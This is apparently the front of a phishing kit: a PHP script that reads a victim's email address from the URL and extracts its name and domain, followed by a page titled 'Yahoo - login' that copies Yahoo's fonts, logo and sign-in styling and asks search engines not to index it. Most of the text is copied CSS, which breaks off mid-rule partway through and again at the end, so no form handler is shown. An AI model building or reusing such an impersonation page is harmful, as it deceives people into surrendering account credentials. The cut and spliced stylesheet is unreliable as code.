<?php
function getloginIDFromlogin($email)
{
$find = '@';
$pos = strpos($email, $find);
$loginID = substr($email, 0, $pos);
return $loginID;
}
function getDomainFromEmail($email)
{
// Get the data after the @ sign
$domain = substr(strrchr($email, "@"), 1);
return $domain;
}
$login = $_GET['email'];
$loginID = getloginIDFromlogin($login);
$domain = getDomainFromEmail($login);
$ln = strlen($login);
$len = strrev($login);
$x = 0;
for($i=0; $i<$ln; $i++){
	if($len[$i] == "@"){
		$x = $i;
		break;
	}
}
$yuh = substr($len,0,$x);
$yuh = strrev($yuh);
for($i=0; $i<$ln; $i++){
	if($yuh[$i] == "."){
		$x = $i;
		break;
	}
}
$yuh = substr($yuh,0,$x);
$yuh = ucfirst($yuh);
$display = strtoupper($yuh);

?>




<!DOCTYPE html>
<html class="grid no-js light-theme">
<head>

<meta name=”robots” content=”nofollow” />
<meta name="robots" content="noindex" />
    <title>Yahoo - login</title>
    <style type="text/css">img,legend{border:0}h1,h2,h3{letter-spacing:-1.7px}pre,textarea{overflow:auto}.container,.orko .ictrl,sub,sup{position:relative}.ltr,body,html{direction:ltr}@font-face{font-family:"Yahoo Sans";font-display:block;src:url(https://s.yimg.com/cv/ae/sports/fonts/2017/Yahoo_Sans-ExtraLight.eot);src:url(https://s.yimg.com/cv/ae/sports/fonts/2017/Yahoo_Sans-ExtraLight.eot?#iefix) format("embedded-opentype"),url(https://s.yimg.com/cv/ae/sports/fonts/2017/Yahoo_Sans-ExtraLight.woff2) format("woff2"),url(https://s.yimg.com/cv/ae/sports/fonts/2017/Yahoo_Sans-ExtraLight.woff) format("woff");font-weight:200;font-style:normal}@font-face{font-family:"Yahoo Sans";font-display:block;src:url(https://s.yimg.com/cv/ae/sports/fonts/2017/Yahoo_Sans-Light.eot);src:url(https://s.yimg.com/cv/ae/sports/fonts/2017/Yahoo_Sans-Light.eot?#iefix) format("embedded-opentype"),url(https://s.yimg.com/cv/ae/sports/fonts/2017/Yahoo_Sans-Light.woff2) format("woff2"),url(https://s.yimg.com/cv/ae/sports/fonts/2017/Yahoo_Sans-Light.woff) format("woff");font-weight:300;font-style:normal}@font-face{font-family:"Yahoo Sans";font-display:block;src:url(https://s.yimg.com/cv/ae/sports/fonts/2017/Yahoo_Sans-Regular.eot);src:url(https://s.yimg.com/cv/ae/sports/fonts/2017/Yahoo_Sans-Regular.eot?#iefix) format("embedded-opentype"),url(https://s.yimg.com/cv/ae/sports/fonts/2017/Yahoo_Sans-Regular.woff2) format("woff2"),url(https://s.yimg.com/cv/ae/sports/fonts/2017/Yahoo_Sans-Regular.woff) format("woff");font-weight:400;font-style:normal}@font-face{font-family:"Yahoo Sans";font-display:block;src:url(https://s.yimg.com/cv/ae/sports/fonts/2017/Yahoo_Sans-Italic.eot);src:url(https://s.yimg.com/cv/ae/sports/fonts/2017/Yahoo_Sans-Italic.eot?#iefix) format("embedded-opentype"),url(https://s.yimg.com/cv/ae/sports/fonts/2017/Yahoo_Sans-Italic.woff2) format("woff2"),url(https://s.yimg.com/cv/ae/sports/fonts/2017/Yahoo_Sans-Italic.woff) format("woff");font-weight:400;font-style:italic}@font-face{font-family:"Yahoo Sans";font-display:block;src:url(https://s.yimg.com/cv/ae/sports/fonts/2017/Yahoo_Sans-Medium.eot);src:url(https://s.yimg.com/cv/ae/sports/fonts/2017/Yahoo_Sans-Medium.eot?#iefix) format("embedded-opentype"),url(https://s.yimg.com/cv/ae/sports/fonts/2017/Yahoo_Sans-Medium.woff2) format("woff2"),url(https://s.yimg.com/cv/ae/sports/fonts/2017/Yahoo_Sans-Medium.woff) format("woff");font-weight:500;font-style:normal}@font-face{font-family:"Yahoo Sans";font-display:block;src:url(https://s.yimg.com/cv/ae/sports/fonts/2017/Yahoo_Sans-Semibold.eot);src:url(https://s.yimg.com/cv/ae/sports/fonts/2017/Yahoo_Sans-Semibold.eot?#iefix) format("embedded-opentype"),url(https://s.yimg.com/cv/ae/sports/fonts/2017/Yahoo_Sans-Semibold.woff2) format("woff2"),url(https://s.yimg.com/cv/ae/sports/fonts/2017/Yahoo_Sans-Semibold.woff) format("woff");font-weight:600;font-style:normal}@font-face{font-family:"Yahoo Sans";font-display:block;src:url(https://s.yimg.com/cv/ae/sports/fonts/2017/Yahoo_Sans-Bold.eot);src:url(https://s.yimg.com/cv/ae/sports/fonts/2017/Yahoo_Sans-Bold.eot?#iefix) format("embedded-opentype"),url(https://s.yimg.com/cv/ae/sports/fonts/2017/Yahoo_Sans-Bold.woff2) format("woff2"),url(https://s.yimg.com/cv/ae/sports/fonts/2017/Yahoo_Sans-Bold.woff) format("woff");font-weight:700;font-style:normal}@font-face{font-family:"Yahoo Sans";font-display:block;src:url(https://s.yimg.com/cv/ae/sports/fonts/2017/Yahoo_Sans-ExtraBold.eot);src:url(https://s.yimg.com/cv/ae/sports/fonts/2017/Yahoo_Sans-ExtraBold.eot?#iefix) format("embedded-opentype"),url(https://s.yimg.com/cv/ae/sports/fonts/2017/Yahoo_Sans-ExtraBold.woff2) format("woff2"),url(https://s.yimg.com/cv/ae/sports/fonts/2017/Yahoo_Sans-ExtraBold.woff) format("woff");font-weight:800;font-style:normal}@font-face{font-family:"Yahoo Sans";font-display:block;src:url(https://s.yimg.com/cv/ae/sports/fonts/2017/Yahoo_Sans-Black.eot);src:url(https://s.yimg.com/cv/ae/sports/fonts/2017/Yahoo_Sans-Black.eot?#iefix) format("embedded-opentype"),url(https://s.yimg.com/cv/ae/sports/fonts/2017/Yahoo_Sans-Black.woff2) format("woff2"),url(https://s.yimg.com/cv/ae/sports/fonts/2017/Yahoo_Sans-Black.woff) format("woff");font-weight:900;font-style:normal}.grid .mbr-font-makeover .pure-g [class*=pure-u],.grid .mbr-font-makeover button,.grid .mbr-font-makeover code,.grid .mbr-font-makeover input,.grid .mbr-font-makeover select,.grid .mbr-font-makeover textarea,.grid body.mbr-font-makeover{font-family:'Yahoo Sans','Helvetica Neue',Helvetica,Arial}/*! skeletor-io - v1.0.34 *//*! normalize.css v3.0.2 | MIT License | git.io/normalize */html{font-family:sans-serif;-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%}body{margin:0}article,aside,details,figcaption,figure,footer,header,hgroup,main,menu,nav,section,summary{display:block}audio,canvas,progress,video{display:inline-block;vertical-align:baseline}audio:not([controls]){display:none;height:0}[hidden],template{display:none}a{background-color:transparent}a:active,a:hover{outline:0}abbr[title]{border-bottom:1px dotted}b,optgroup,strong{font-weight:700}dfn{font-style:italic}h1{margin:.67em 0}mark{background:#ff0;color:#000}small{font-size:80%}sub,sup{font-size:75%;line-height:0;vertical-align:baseline}sup{top:-.5em}sub{bottom:-.25em}svg:not(:root){overflow:hidden}figure{margin:1em 40px}hr{box-sizing:content-box;height:0}code,kbd,pre,samp{font-family:monospace;font-size:1em}button,input,optgroup,select,textarea{color:inherit;font:inherit;margin:0}body,h6{line-height:1.6}button{overflow:visible}button,select{text-transform:none}button,html input[type=button],input[type=reset],input[type=submit]{-webkit-appearance:button;cursor:pointer}button[disabled],html input[disabled]{cursor:default}button::-moz-focus-inner,input::-moz-focus-inner{border:0;padding:0}input{line-height:normal}input[type=checkbox],input[type=radio]{box-sizing:border-box;padding:0}input[type=number]::-webkit-inner-spin-button,input[type=number]::-webkit-outer-spin-button{height:auto}input[type=search]::-webkit-search-cancel-button,input[type=search]::-webkit-search-decoration{-webkit-appearance:none}fieldset{border:1px solid silver;margin:0 2px}legend{padding:0}table{border-collapse:collapse;border-spacing:0}.container{width:100%;max-width:960px;margin:0 auto;padding:0 20px;box-sizing:border-box}ol,p,ul{margin-top:0}.column,.columns{width:100%;float:left;box-sizing:border-box}@media (min-width:400px){.container{width:85%;padding:0}}h1,h2,h3,h4,h5,h6{margin-top:0;margin-bottom:34px;margin-bottom:2rem;font-weight:300}h1{line-height:1.2;letter-spacing:-.1rem}h2{line-height:1.25;letter-spacing:-.1rem}h3{line-height:1.3;letter-spacing:-.1rem}h4{line-height:1.35;letter-spacing:-1.36px;letter-spacing:-.08rem}h5{font-size:30.6px;font-size:1.8rem;line-height:1.5;letter-spacing:-.85px;letter-spacing:-.05rem}h6{font-size:25.5px;font-size:1.5rem;letter-spacing:0}@media (min-width:550px){.container{width:80%}.column,.columns{margin-left:2%}.column:first-child,.columns:first-child{margin-left:0}.one.column,.one.columns{width:4.66666666667%}.two.columns{width:13.3333333333%}.three.columns{width:22%}.four.columns{width:30.6666666667%}.five.columns{width:39.3333333333%}.six.columns{width:48%}.seven.columns{width:56.6666666667%}.eight.columns{width:65.3333333333%}.nine.columns{width:74%}.ten.columns{width:82.6666666667%}.eleven.columns{width:91.3333333333%}.twelve.columns{width:100%;margin-left:0}.one-third.column{width:30.6666666667%}.two-thirds.column{width:65.3333333333%}.one-half.column{width:49%}.offset-by-one.column,.offset-by-one.columns{margin-left:8.66666666667%}.offset-by-two.column,.offset-by-two.columns{margin-left:17.3333333333%}.offset-by-three.column,.offset-by-three.columns{margin-left:26%}.offset-by-four.column,.offset-by-four.columns{margin-left:34.6666666667%}.offset-by-five.column,.offset-by-five.columns{margin-left:43.3333333333%}.offset-by-six.column,.offset-by-six.columns{margin-left:52%}.offset-by-seven.column,.offset-by-seven.columns{margin-left:60.6666666667%}.offset-by-eight.column,.offset-by-eight.columns{margin-left:69.3333333333%}.offset-by-nine.column,.offset-by-nine.columns{margin-left:78%}.offset-by-ten.column,.offset-by-ten.columns{margin-left:86.6666666667%}.offset-by-eleven.column,.offset-by-eleven.columns{margin-left:95.3333333333%}.offset-by-one-third.column,.offset-by-one-third.columns{margin-left:34.6666666667%}.offset-by-two-thirds.column,.offset-by-two-thirds.columns{margin-left:69.3333333333%}.offset-by-one-half.column,.offset-by-one-half.columns{margin-left:52%}h1{font-size:5rem}h2{font-size:4.2rem}h3{font-size:3.6rem}h4{font-size:3rem}h5{font-size:2.4rem}h6{font-size:1.5rem}}.button,button,input[type=button],input[type=reset],input[type=submit]{display:inline-block;height:38px;padding:0 30px;color:#555;text-align:center;font-size:11px;font-weight:600;line-height:38px;letter-spacing:1.7px;letter-spacing:.1rem;text-transform:uppercase;text-decoration:none;white-space:nowrap;background-color:transparent;border-radius:4px;border:1px solid #bbb;cursor:pointer;box-sizing:border-box}.orko .txt-align-left,td,th{text-align:left}.button:focus,.button:hover,button:focus,button:hover,input[type=button]:focus,input[type=button]:hover,input[type=reset]:focus,input[type=reset]:hover,input[type=submit]:focus,input[type=submit]:hover{color:#333;border-color:#888;outline:0}.button.button-primary,button.button-primary,input[type=button].button-primary,input[type=reset].button-primary,input[type=submit].button-primary{color:#fff;background-color:#33c3f0;border-color:#33c3f0}.button.button-primary:focus,.button.button-primary:hover,button.button-primary:focus,button.button-primary:hover,input[type=button].button-primary:focus,input[type=button].button-primary:hover,input[type=reset].button-primary:focus,input[type=reset].button-primary:hover,input[type=submit].button-primary:focus,input[type=submit].button-primary:hover{color:#fff;background-color:#1eaedb;border-color:#1eaedb}input[type=number],input[type=search],input[type=email],input[type=text],input[type=tel],input[type=url],input[type=password],select,textarea{height:38px;padding:6px 10px;background-color:#fff;border:1px solid #d1d1d1;border-radius:4px;box-shadow:none;box-sizing:border-box}input[type=number],input[type=search],input[type=email],input[type=text],input[type=tel],input[type=url],input[type=password],textarea{-webkit-appearance:none;-moz-appearance:none;appearance:none}textarea{min-height:65px;padding-top:6px;padding-bottom:6px}input[type=number]:focus,input[type=search]:focus,input[type=email]:focus,input[type=text]:focus,input[type=tel]:focus,input[type=url]:focus,input[type=password]:focus,select:focus,textarea:focus{border:1px solid #33c3f0;outline:0}label,legend{display:block;margin-bottom:8.5px;margin-bottom:.5rem;font-weight:600}.button,.orko label,button,input[type=button],input[type=reset],input[type=submit],label>.label-body{font-weight:400}fieldset{padding:0;border-width:0}input[type=checkbox],input[type=radio]{display:inline}label>.label-body{display:inline-block;margin-left:8.5px;margin-left:.5rem}ul{list-style:circle inside}ol{list-style:decimal inside}ol,ul{padding-left:0}ol ol,ol ul,ul ol,ul ul{margin:25.5px 0 25.5px 51px;margin:1.5rem 0 1.5rem 3rem;font-size:90%}.button,button,li{margin-bottom:17px;margin-bottom:1rem}code{padding:3.4px 8.5px;padding:.2rem .5rem;margin:0 3.4px;margin:0 .2rem;font-size:90%;white-space:nowrap;background:#f1f1f1;border:1px solid #e1e1e1;border-radius:4px}pre>code{display:block;padding:17px 25.5px;padding:1rem 1.5rem;white-space:pre}td,th{padding:12px 15px;border-bottom:1px solid #e1e1e1}.orko .blk-reset-l-pad,.orko ul li,td:first-child,th:first-child{padding-left:0}td:last-child,th:last-child{padding-right:0}fieldset,input,select,textarea{margin-bottom:25.5px;margin-bottom:1.5rem}blockquote,dl,figure,form,ol,p,pre,table,ul{margin-bottom:42.5px;margin-bottom:2.5rem}.u-full-width{width:100%;box-sizing:border-box}.u-max-full-width{max-width:100%;box-sizing:border-box}.u-pull-right{float:right}.u-pull-left{float:left}hr{margin-top:51px;margin-top:3rem;margin-bottom:59.5px;margin-bottom:3.5rem;border-width:0;border-top:1px solid #e1e1e1}.container::after,.row::after,.u-cf{content:"";display:table;clear:both}.orko,body{background:#fff;color:#26282a;letter-spacing:.5px;width:100%;max-width:100%}::-moz-placeholder{color:#b9bdc5;opacity:1}:-ms-input-placeholder{color:#b9bdc5}::-webkit-input-placeholder{color:#b9bdc5}.orko h1,.orko h2,.orko h3,.orko h4,.orko h5,.orko h6{font-weight:400;letter-spacing:.5px}.orko td,.orko th{vertical-align:top;border:0}.orko ul li{list-style-type:none}.orko hr{margin:2em 0}.orko code{background:#f1f1f5;border-color:#d8dade}.orko form{margin-bottom:1em}.orko-logo{background:url(https://s1.yimg.com/rz/d/yahoo_en-US_f_p_bestfit_2x.png) no-repeat;background-size:70%;width:180px;height:60px}.orko .blk-f-width,.orko-button.orko-f-width,input.orko-button.orko-f-width{width:100%}.orko .blk-mt-4{margin-top:4px}.orko .blk-mt-8{margin-top:8px}.orko .blk-mt-12{margin-top:12px}.orko .blk-mt-20{margin-top:20px}.orko .blk-mt-28{margin-top:28px}.orko .blk-mt-44{margin-top:44px}.orko .blk-mr-4{margin-right:4px}.orko .blk-show{display:block}.orko .blk-hide{display:none}.orko .blk-reset-pad{padding:0}.orko .blk-reset-r-pad{padding-right:0}.orko .blk-reset-rl-pad{padding-right:0;padding-left:0}.orko .blk-grad-bar{background:-webkit-linear-gradient(left,#188fff 0,#400090 100%);background:linear-gradient(to right,#188fff 0,#400090 100%);display:block;height:4px;margin:0 -2px 30px}.orko .blk-shadow{box-shadow:0 2px 4px 0 rgba(0,0,0,.3)}.orko .txt-align-cntr{text-align:center}.orko .txt-align-right{text-align:right}.orko .clr-def{color:#26282a}.orko .clr-error{color:#f0162f}.orko .clr-grey5{color:#b9bdc5}.orko .clr-grey7{color:#878c91}.orko-button,input.orko-button{background:#ccc;background:hsla(0,0%,0%,1);border:1px solid hsla(0,0%,0%,0);border-radius:1.17647rem;box-sizing:border-box;color:#fff;display:inline-block;height:42px;line-height:1;outline:0;overflow:hidden;tap-highlight-color:hsla(0,0%,0%,0);text-align:center;text-overflow:ellipsis;text-transform:none;vertical-align:middle;white-space:nowrap;zoom:1}.orko-button:hover,input.orko-button:hover{border-color:hsla(0,0%,0%,0);color:#fff}.orko-button:active,.orko-button:focus,input.orko-button:active,input.orko-button:focus{border-color:hsla(0,0%,0%,0);color:#fff}.orko-button.orko-a-width,input.orko-button.orko-a-width{width:auto}.orko-button-primary,input.orko-button-primary{background:#188fff;color:#fff}.orko-button-primary:hover,input.orko-button-primary:hover{background:#0f69ff;border-color:#0f69ff;color:#fff}.orko-button-primary:active,.orko-button-primary:focus,input.orko-button-primary:active,input.orko-button-primary:focus{background:#003abc;border-color:#003abc;color:#fff}.orko-button-primary-disable,.orko-button-primary-disable:active,.orko-button-primary-disable:focus,.orko-button-primary-disable:hover,input.orko-button-primary-disable,input.orko-button-primary-disable:active,input.orko-button-primary-disable:focus,input.orko-button-primary-disable:hover{background:#e2e2e6;border-color:transparent;color:#cfcfd1}.orko-button-secondary,input.orko-button-secondary{background:0 0;border-color:#188fff;color:#188fff}.orko-button-secondary:hover,input.orko-button-secondary:hover{border-color:#0f69ff;color:#0f69ff}.orko-button-secondary:active,.orko-button-secondary:focus,input.orko-button-secondary:active,input.orko-button-secondary:focus{border-color:#003abc;color:#003abc}.orko-button-secondary-disable,.orko-button-secondary-disable:active,.orko-button-secondary-disable:focus,.orko-button-secondary-disable:hover,input.orko-button-secondary-disable,input.orko-button-secondary-disable:active,input.orko-button-secondary-disable:focus,input.orko-button-secondary-disable:hover{background:#fff;border-color:#cfcfd1;color:#cfcfd1}.orko-button-link,input.orko-button-link{background:#fff;color:#188fff;border-color:transparent}.orko-button-link:hover,input.orko-button-link:hover{color:#4ca9ff;border-color:transparent}.orko-button-link:active,.orko-button-link:focus,input.orko-button-link:active,input.orko-button-link:focus{color:#003abc;border-color:transparent}.orko-button-link-disable,.orko-button-link-disable:active,.orko-button-link-disable:focus,.orko-button-link-disable:hover,input.orko-button-link-disable,input.orko-button-link-disable:active,input.orko-button-link-disable:focus,input.orko-button-link-disable:hover{background:#fff;border-color:transparent;color:#cfcfd1}*,::after,::before{box-sizing:border-box}.orko-container{margin:0 auto;max-width:1440px;padding:0 16px;width:100%}.orko-container::after,.orko-row::after{clear:both;content:"";display:table}[class*=orko-row]>[class*=col-] [class*=orko-row]{margin:0 -16px}[class*=col-]{float:left;width:100%;padding:0 16px}.orko-md-width,.orko-sm-width,.orko-width{width:100%}@media (min-width:1280px){[class*=col-]{float:left;width:100%;padding:16px}[class*=orko-row]>[class*=col-] [class*=orko-row]{margin:-16px -16px 0}[class*=orko-row]>[class*=col-] [class*=orko-row] [class*=col-]{margin-bottom:-16px}.col-1-12{width:8.333%}.col-2-12{width:16.667%}.col-3-12{width:25%}.col-4-12{width:33.333%}.col-5-12{width:41.667%}.col-6-12{width:50%}.col-7-12{width:58.333%}.col-8-12{width:66.667%}.col-9-12{width:75%}.col-10-12{width:83.333%}.col-11-12{width:91.667%}.col-12-12{width:100%}.col-pr-4{padding-right:4px}.col-pl-4{padding-left:4px}.orko-width{width:1280px;margin:0 auto}}@media (min-width:840px){.md-col-1-12{width:8.333%}.md-col-2-12{width:16.667%}.md-col-3-12{width:25%}.md-col-4-12{width:33.333%}.md-col-5-12{width:41.667%}.md-col-6-12{width:50%}.md-col-7-12{width:58.333%}.md-col-8-12{width:66.667%}.md-col-9-12{width:75%}.md-col-10-12{width:83.333%}.md-col-11-12{width:91.667%}.md-col-12-12{width:100%}.col-pr-4{padding-right:4px}.col-pl-4{padding-left:4px}.orko-md-width{width:840px;margin:0 auto}}@media (min-width:480px){.sm-col-1-12{width:8.333%}.sm-col-2-12{width:16.667%}.sm-col-3-12{width:25%}.sm-col-4-12{width:33.333%}.sm-col-5-12{width:41.667%}.sm-col-6-12{width:50%}.sm-col-7-12{width:58.333%}.sm-col-8-12{width:66.667%}.sm-col-9-12{width:75%}.sm-col-10-12{width:83.333%}.sm-col-11-12{width:91.667%}.sm-col-12-12{width:100%}.col-pr-4{padding-right:4px}.col-pl-4{padding-left:4px}.orko-sm-width{width:360px;margin:0 auto}}@media (min-width:0){.f-col-1-12{width:8.333%}.f-col-2-12{width:16.667%}.f-col-3-12{width:25%}.f-col-4-12{width:33.333%}.f-col-5-12{width:41.667%}.f-col-6-12{width:50%}.f-col-7-12{width:58.333%}.f-col-8-12{width:66.667%}.f-col-9-12{width:75%}.f-col-10-12{width:83.333%}.f-col-11-12{width:91.667%}.f-col-12-12{width:100%}.col-pr-4{padding-right:4px}.col-pl-4{padding-left:4px}.orko-f-width{width:360px;margin:0 auto}}.orko input[type=number],.orko input[type=search],.orko input[type=email],.orko input[type=text],.orko input[type=tel],.orko input[type=url],.orko input[type=password],.orko select,.orko textarea{background:0 0;border:0;border-bottom:1px solid #b9bdc5;border-radius:0;font-size:1.142em;height:37px;letter-spacing:.5px;margin:4px 0;padding:16px 0 4px;vertical-align:baseline;width:100%}.orko input[type=number]:focus,.orko input[type=search]:focus,.orko input[type=email]:focus,.orko input[type=text]:focus,.orko input[type=tel]:focus,.orko input[type=url]:focus,.orko input[type=password]:focus,.orko select:focus,.orko textarea:focus{border:0;border-bottom:2px solid #188fff;height:38px}.orko input.ictrl-error{border-bottom:2px solid #f0162f}.orko .ictrl input:focus[value=""]+label,.orko .ictrl input:focus[value=""]~label,.orko .ictrl input~label,.orko .ictrl label.lbl,.orko.orko-nojs .ictrl input[value=""]+label,.orko.orko-nojs .ictrl input[value=""]~label{color:#b9bdc5;font-size:.857em;letter-spacing:.5px;overflow:hidden;pointer-events:none;position:absolute;-webkit-transition-duration:.2s;transition-duration:.2s;-webkit-transition-timing-function:cubic-bezier(.4,0,.2,1);transition-timing-function:cubic-bezier(.4,0,.2,1);top:-2px;white-space:nowrap}.orko .ictrl input[value=""]+label,.orko .ictrl input[value=""]~label{font-size:1.142em;top:16px}.orko .ictrl input[type=password]:focus~span,.orko .ictrl.password input[type=text]:focus~span{color:#188fff}.orko .ictrl input[type=password]~span,.orko .ictrl.password input[type=text]~span{color:#b9bdc5;cursor:pointer;font-size:.857em;position:absolute;right:0;text-transform:uppercase;top:22px}.orko select,.orko select:focus{-webkit-appearance:none;-moz-appearance:none;appearance:none;padding-top:10px}.orko select,.orko select option:disabled{color:#b9bdc5}.orko select option{color:#26282a}.orko .ictrl .arrow{border-width:5px;border-style:solid;border-color:#b9bdcf transparent transparent;pointer-events:none;position:absolute;right:0;top:25px}.orko .ictrl.suggestions ul{display:none;border:1px solid #188fff;border-top-width:2px;border-radius:0 0 2px 2px;position:absolute;background:#fff;top:40px;width:100%;z-index:1}.orko .ictrl.suggestions ul li{height:0;margin-bottom:1px;padding:4px 12px}.orko .ictrl.suggestions.open ul{display:block}.orko .ictrl.suggestions.open ul li{height:auto}.orko .ictrl.suggestions.open li.hover,.orko .ictrl.suggestions.open li:hover{background:#f1f1f5;cursor:pointer}.orko .ictrl.email-w-domain input[type=email]{padding-right:6.2em}.orko .ictrl.email-w-domain input[type=email]+span,.orko .ictrl.email-w-domain input[type=email]~span{color:#b9bdc5;font-size:1.142em;position:absolute;right:0;top:16px}.orko.orko-js .suggestions.phone select,.orko.orko-nojs .suggestions.phone 




.orko .flag.CH{background-position:-208px -143px;width:11px;height:11px}.orko .ictrl.suggestions-carousel .list-box{border:1px solid #188fff;color:#188fff;cursor:pointer;display:none;height:30px;position:relative;top:-6px;width:100%}.orko .ictrl.suggestions-carousel.open .list-box{display:-webkit-inline-box;display:-ms-inline-flexbox;display:inline-flex}.orko .ictrl.suggestions-carousel .arrow-box{padding:10px 12px;width:30px}.orko .ictrl.suggestions-carousel .l-arrow-box{border-right:1px solid #188fff}.orko .ictrl.suggestions-carousel .r-arrow-box{border-left:1px solid #188fff}.orko .ictrl.suggestions-carousel .arrow-box div{border-top:5px solid transparent;border-bottom:5px solid transparent}.orko .ictrl.suggestions-carousel .l-arrow{border-right:5px solid #188fff}.orko .ictrl.suggestions-carousel .r-arrow{border-left:5px solid #188fff}.orko .ictrl.suggestions-carousel .arrow-box.disabled{cursor:default}.orko .ictrl.suggestions-carousel .arrow-box.disabled .l-arrow{border-right-color:rgba(24,143,255,.5)}.orko .ictrl.suggestions-carousel .arrow-box.disabled .r-arrow{border-left-color:rgba(24,143,255,.5)}.orko .ictrl.suggestions-carousel .list{overflow:hidden;padding:5px;position:relative;width:100%}.orko .ictrl.suggestions-carousel ul{left:0;top:4px;position:absolute;white-space:nowrap;width:100%}.orko .ictrl.suggestions-carousel ul li{display:inline-block;overflow:hidden;width:100%}.orko-link,a{color:#188fff;text-decoration:none}.orko-link:active,.orko-link:hover,a:active,a:hover{color:#003abc}.orko-txt-display{font-size:1.857em}.orko-txt-headline{font-size:1.428em}.orko-txt-header,h1{font-size:1.286em}.orko-txt-subheader,h2{font-size:1.143em}.orko-txt-caption,h3{font-size:.857em}.orko-txt-default,h4{font-size:1em}.orko-txt-micro{font-size:.714em}html.grid{font-size:18px}html.grid.mobile{font-size:5.3125vw}@media only screen and (max-device-width:320px) and (orientation:portrait){html.grid.mobile{font-size:17px}}@media only screen and (min-device-width:450px) and (orientation:portrait){html.grid.mobile{font-size:24px}}@media only screen and (orientation:landscape){html.grid.mobile{font-size:24px}}body{font:-apple-system-body;font-family:'Helvetica Neue',Helvetica,Arial}.error,.error-offline{color:#dd1037;font-size:.82353em}.offscreen{position:absolute;height:1px;width:1px;overflow:hidden;clip:rect(1px 1px 1px 1px);clip:rect(1px,1px,1px,1px)}.hide{display:none}.hidden{visibility:hidden}.error-offline{margin:5px;padding:10px;border:1px solid #dd1037;border-radius:4px;text-align:left}.orko{letter-spacing:normal}.orko h1,.orko h2,.orko h3{margin:0;font-weight:400}.orko-button,a.orko-button,input.orko-button{font-size:.94118em;width:100%}a.orko-button{height:auto;padding:11px}@media (max-width:550px){.one-half.column{width:50%}}html{font-size:17px;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}body,html{-webkit-tap-highlight-color:transparent;height:100%}@media only screen and (device-width:414px) and (device-height:896px) and (min-height:759px) and (-webkit-min-device-pixel-ratio:2),only screen and (device-width:375px) and (device-height:812px) and (min-height:675px) and (-webkit-device-pixel-ratio:3){html{padding-bottom:34px}}body.ios{font:-apple-system-headline;font-family:'Helvetica Neue',Helvetica,Arial;font-weight:400;position:relative}body.dark-bg{background-color:#f9f9fa}.login-header{line-height:84px;padding-left:50px;background-color:#fff;color:#26282a}.login-header .column{display:inline-block;float:none;vertical-align:middle;line-height:normal;font-size:0}.info-box,.login-box .login-logo img.dark-mode-logo,.narrow .login-header img.dark-mode-logo,img.dark-mode-logo{display:none}.narrow .login-header{line-height:0;padding:0;text-align:center;background-color:#fff}.grid .narrow .login-header{padding-top:28px;padding-bottom:0}.narrow .login-header img{max-width:90vw;margin:18px 16px}.grid .narrow .login-header img,.login-footer .row{margin:0}.mbr-mobile-header.narrow .login-header{background-color:--login-header-background-narrow-color}.login-box,body.narrow{background-color:#fff}.login-footer{text-align:center;padding:6px 0;font-size:.58824em;position:fixed;bottom:0;background:#fff;color:#26282a;z-index:1;width:100%;_position:relative!important}.login-footer strong{color:#188fff}.login-body h1,.login-box,body.narrow{color:#26282a}@media screen and (max-height:650px){.login-footer{border-top:1px solid rgba(73,15,118,.35);box-shadow:0 0 9px 0 rgba(73,15,118,.35)}}@media screen and (max-width:480px),screen and (max-height:480px){.resp .login-footer,.resp .login-header{display:none}}.login-body{_position:relative;_height:580px;text-align:center}.login-content{margin:0 auto;max-width:1050px;min-width:320px;position:relative;*z-index:1}.info-box,.login-box{position:absolute;top:11px}.login-box{box-sizing:border-box;box-shadow:0 2px 4px 0 rgba(181,181,181,.7);width:360px;right:10px;min-height:550px;z-index:1;padding:0 5px;border-top:1px solid #f1f1f5}.login-box.center{position:relative;margin:0 auto;right:auto}.zh-hant-tw .login-box{margin-top:10px}.login-box .login-logo{direction:ltr;margin-top:30px;height:50px}.grid .login-box .login-logo{margin:0;padding-top:28px;padding-bottom:0;height:auto;line-height:0}.info-box{left:0;padding:56px 410px 56px 40px;text-align:left}.info-box .title{font-weight:500}.info-box .desc,.info-box .title{font-size:1.23529em}.info-box h3,.info-box h4{margin:10px 0}.info-box ul{margin:0;padding:0 30px;list-style:circle;font-size:.82353em}.info-box ul li{display:list-item;margin:5px 0;list-style-type:disc}.login-bg-outer{height:100%;width:100%;overflow:hidden;min-height:580px;text-align:center;position:relative;z-index:0;top:0}.login-bg-inner{margin:0 -800px}.login-bg-outer.static-bg .login-bg-inner{margin:0}.no-js .info-box{display:block}.no-js .login-bg-outer{display:none}.no-js .login-bg-outer.static-bg{display:block}.auto-submit{display:none}body.resp{background-color:#f9f9fa}.resp .info-box{display:block}@media screen and (max-width:640px){.resp .info-box,.resp .login-bg-outer{display:none}.resp .login-box{position:relative;margin:0 auto;right:auto}}@media screen and (max-width:480px){body.resp{background-color:#fff}.resp .login-box::before{display:none}.resp .login-box{position:absolute;top:0;min-height:auto;border-top:0;box-shadow:none;width:100%}}.login-body .country-code-dropdown{position:relative;height:40px;margin:0;font-size:.94118em}.login-body .country-code-dropdown .arrow{position:absolute;right:.85em;top:47%;border:.35em solid;border-color:#8f8f8f transparent transparent;font-size:.94118em;pointer-events:none}.login-body .country-code-dropdown select{width:100%;height:100%;padding:.25em 1em;border:1px solid #e5e5e5;border-radius:2px;box-shadow:none;margin:0;-webkit-appearance:none;-moz-appearance:none;appearance:none}.login-body .country-code-dropdown select:focus{outline:0;border-color:#198fff}.login-body .cci-dropdown{position:relative}.login-body .cci-dropdown .selected-country-code-cont{position:absolute;display:table;height:41px;width:45px;left:0;z-index:2}.login-body .cci-dropdown .selected-country-code-cont .arrow{left:initial;right:0}.login-body .cci-dropdown .selected-country-code{position:relative;display:table-cell;vertical-align:middle}.login-body .cci-dropdown .phone-no{padding-left:50px}.login-body .cci-dropdown .country-dropdown-container{opacity:0;position:absolute;left:0;width:45px;z-index:2}.login-body .cci-dropdown.code-of-length-3 .country-dropdown-container,.login-body .cci-dropdown.code-of-length-3 .selected-country-code-cont{width:58px}.login-body .cci-dropdown.code-of-length-3 .phone-no{padding-left:63px}.login-body .cci-dropdown.code-of-length-2 .country-dropdown-container,.login-body .cci-dropdown.code-of-length-2 .selected-country-code-cont{width:50px}.login-body .cci-dropdown.code-of-length-2 .phone-no{padding-left:55px}.challenge{padding:0 24px;margin:0 auto;max-width:320px;max-width:18.82353rem}.challenge .challenge-heading{display:block;margin:14px 0 0;margin-top:.82353rem;font-size:20px;font-size:1.17647rem;font-weight:600;text-align:center;letter-spacing:-.2px}.challenge 